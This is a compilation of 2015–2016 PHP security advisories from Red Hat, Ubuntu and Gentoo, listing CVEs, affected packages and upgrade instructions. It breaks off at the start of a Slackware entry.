SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php security and bug fix update\nAdvisory ID: RHSA-2015:1135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html\nIssue date: 2015-06-23\nCVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 \n CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 \n CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 \n CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 \n CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 \n CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 \n CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 \n CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP\u0027s Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP\u0027s enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash. \n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption. \n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize()\n1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)\n1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c\n1188599 - CVE-2014-9652 file: out of bounds read in mconvert()\n1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c\n1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone\n1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict()\n1194747 - CVE-2015-2301 php: use after free in phar_object.c\n1204868 - CVE-2015-4147 php: SoapClient\u0027s __call() type confusion through unserialize()\n1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re\n1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1226916 - CVE-2015-4148 php: SoapClient\u0027s do_soap_call() type confusion after unserialize()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nppc64:\nphp-5.4.16-36.el7_1.ppc64.rpm\nphp-cli-5.4.16-36.el7_1.ppc64.rpm\nphp-common-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-gd-5.4.16-36.el7_1.ppc64.rpm\nphp-ldap-5.4.16-36.el7_1.ppc64.rpm\nphp-mysql-5.4.16-36.el7_1.ppc64.rpm\nphp-odbc-5.4.16-36.el7_1.ppc64.rpm\nphp-pdo-5.4.16-36.el7_1.ppc64.rpm\nphp-pgsql-5.4.16-36.el7_1.ppc64.rpm\nphp-process-5.4.16-36.el7_1.ppc64.rpm\nphp-recode-5.4.16-36.el7_1.ppc64.rpm\nphp-soap-5.4.16-36.el7_1.ppc64.rpm\nphp-xml-5.4.16-36.el7_1.ppc64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-5.4.16-36.el7_1.s390x.rpm\nphp-cli-5.4.16-36.el7_1.s390x.rpm\nphp-common-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-gd-5.4.16-36.el7_1.s390x.rpm\nphp-ldap-5.4.16-36.el7_1.s390x.rpm\nphp-mysql-5.4.16-36.el7_1.s390x.rpm\nphp-odbc-5.4.16-36.el7_1.s390x.rpm\nphp-pdo-5.4.16-36.el7_1.s390x.rpm\nphp-pgsql-5.4.16-36.el7_1.s390x.rpm\nphp-process-5.4.16-36.el7_1.s390x.rpm\nphp-recode-5.4.16-36.el7_1.s390x.rpm\nphp-soap-5.4.16-36.el7_1.s390x.rpm\nphp-xml-5.4.16-36.el7_1.s390x.rpm\nphp-xmlrpc-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.ael7b_1.src.rpm\n\nppc64le:\nphp-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-cli-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-common-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-gd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-ldap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-odbc-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pdo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-process-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-recode-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-soap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xml-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nphp-bcmath-5.4.16-36.el7_1.ppc64.rpm\nphp-dba-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-devel-5.4.16-36.el7_1.ppc64.rpm\nphp-embedded-5.4.16-36.el7_1.ppc64.rpm\nphp-enchant-5.4.16-36.el7_1.ppc64.rpm\nphp-fpm-5.4.16-36.el7_1.ppc64.rpm\nphp-intl-5.4.16-36.el7_1.ppc64.rpm\nphp-mbstring-5.4.16-36.el7_1.ppc64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.ppc64.rpm\nphp-pspell-5.4.16-36.el7_1.ppc64.rpm\nphp-snmp-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-bcmath-5.4.16-36.el7_1.s390x.rpm\nphp-dba-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-devel-5.4.16-36.el7_1.s390x.rpm\nphp-embedded-5.4.16-36.el7_1.s390x.rpm\nphp-enchant-5.4.16-36.el7_1.s390x.rpm\nphp-fpm-5.4.16-36.el7_1.s390x.rpm\nphp-intl-5.4.16-36.el7_1.s390x.rpm\nphp-mbstring-5.4.16-36.el7_1.s390x.rpm\nphp-mysqlnd-5.4.16-36.el7_1.s390x.rpm\nphp-pspell-5.4.16-36.el7_1.s390x.rpm\nphp-snmp-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nphp-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-dba-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-devel-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-embedded-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-enchant-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-fpm-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-intl-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pspell-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-snmp-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8142\nhttps://access.redhat.com/security/cve/CVE-2014-9652\nhttps://access.redhat.com/security/cve/CVE-2014-9705\nhttps://access.redhat.com/security/cve/CVE-2014-9709\nhttps://access.redhat.com/security/cve/CVE-2015-0231\nhttps://access.redhat.com/security/cve/CVE-2015-0232\nhttps://access.redhat.com/security/cve/CVE-2015-0273\nhttps://access.redhat.com/security/cve/CVE-2015-2301\nhttps://access.redhat.com/security/cve/CVE-2015-2348\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-2787\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4147\nhttps://access.redhat.com/security/cve/CVE-2015-4148\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4599\nhttps://access.redhat.com/security/cve/CVE-2015-4600\nhttps://access.redhat.com/security/cve/CVE-2015-4601\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFViR1aXlSAg2UNWIIRAuxPAJ42GLQVzvzc9kje0VjDv8NZWcPv6QCbBL+O\ndtqycPWs+07GhjmZ6NNx5Bg=\n=FREZ\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2658-1\nJuly 06, 2015\n\nphp5 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in PHP. \n\nSoftware Description:\n- php5: HTML-embedded scripting language interpreter\n\nDetails:\n\nNeal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL\nbytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-4598)\n\nEmmanuel Law discovered that the PHP phar extension incorrectly handled\nfilenames starting with a NULL byte. (CVE-2015-4022,\nCVE-2015-4643)\n\nShusheng Liu discovered that PHP incorrectly handled certain malformed form\ndata. (CVE-2015-4024)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\ndata types. (CVE-2015-4147)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\nthat the uri property is a string. A remote attacker could possibly use these issues to\nobtain sensitive information or cause a denial of service. This issue only affected Ubuntu\n15.04. (CVE-2015-4644)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2\n php5-cgi 5.6.4+dfsg-4ubuntu6.2\n php5-cli 5.6.4+dfsg-4ubuntu6.2\n php5-fpm 5.6.4+dfsg-4ubuntu6.2\n\nUbuntu 14.10:\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6\n php5-cgi 5.5.12+dfsg-2ubuntu4.6\n php5-cli 5.5.12+dfsg-2ubuntu4.6\n php5-fpm 5.5.12+dfsg-2ubuntu4.6\n\nUbuntu 14.04 LTS:\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11\n php5-cgi 5.5.9+dfsg-1ubuntu4.11\n php5-cli 5.5.9+dfsg-1ubuntu4.11\n php5-fpm 5.5.9+dfsg-1ubuntu4.11\n\nUbuntu 12.04 LTS:\n libapache2-mod-php5 5.3.10-1ubuntu3.19\n php5-cgi 5.3.10-1ubuntu3.19\n php5-cli 5.3.10-1ubuntu3.19\n php5-fpm 5.3.10-1ubuntu3.19\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201606-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: PHP: Multiple vulnerabilities\n Date: June 19, 2016\n Bugs: #537586, #541098, #544186, #544330, #546872, #549538,\n #552408, #555576, #555830, #556952, #559612, #562882,\n #571254, #573892, #577376\n ID: 201606-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in PHP, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nBackground\n==========\n\nPHP is a widely-used general-purpose scripting language that is\nespecially suited for Web development and can be embedded into HTML. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as\nPHP 5.4 is now masked in Portage:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.6 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.6.19\"\n\nReferences\n==========\n\n[ 1 ] CVE-2013-6501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501\n[ 2 ] CVE-2014-9705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705\n[ 3 ] CVE-2014-9709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709\n[ 4 ] CVE-2015-0231\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231\n[ 5 ] CVE-2015-0273\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273\n[ 6 ] CVE-2015-1351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351\n[ 7 ] CVE-2015-1352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352\n[ 8 ] CVE-2015-2301\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301\n[ 9 ] CVE-2015-2348\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348\n[ 10 ] CVE-2015-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783\n[ 11 ] CVE-2015-2787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787\n[ 12 ] CVE-2015-3329\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329\n[ 13 ] CVE-2015-3330\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330\n[ 14 ] CVE-2015-4021\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021\n[ 15 ] CVE-2015-4022\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022\n[ 16 ] CVE-2015-4025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025\n[ 17 ] CVE-2015-4026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026\n[ 18 ] CVE-2015-4147\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147\n[ 19 ] CVE-2015-4148\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148\n[ 20 ] CVE-2015-4642\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642\n[ 21 ] CVE-2015-4643\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643\n[ 22 ] CVE-2015-4644\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644\n[ 23 ] CVE-2015-6831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831\n[ 24 ] CVE-2015-6832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832\n[ 25 ] CVE-2015-6833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833\n[ 26 ] CVE-2015-6834\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834\n[ 27 ] CVE-2015-6835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835\n[ 28 ] CVE-2015-6836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836\n[ 29 ] CVE-2015-6837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837\n[ 30 ] CVE-2015-6838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838\n[ 31 ] CVE-2015-7803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803\n[ 32 ] CVE-2015-7804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201606-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. \n\n\nHere are the details from the Slackware 14.1 